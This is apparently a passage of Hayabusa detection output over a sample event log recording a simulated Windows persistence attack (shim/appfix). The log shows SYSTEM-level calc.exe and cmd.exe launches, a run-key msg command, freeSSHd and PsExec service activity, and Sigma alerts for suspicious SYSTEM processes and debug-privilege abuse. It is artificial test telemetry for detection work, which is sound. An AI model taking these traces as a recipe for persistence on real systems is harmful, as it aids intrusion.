+09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 
365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
\SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 
365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 
365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 
365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: 
C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: 
C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 
365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 
1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 
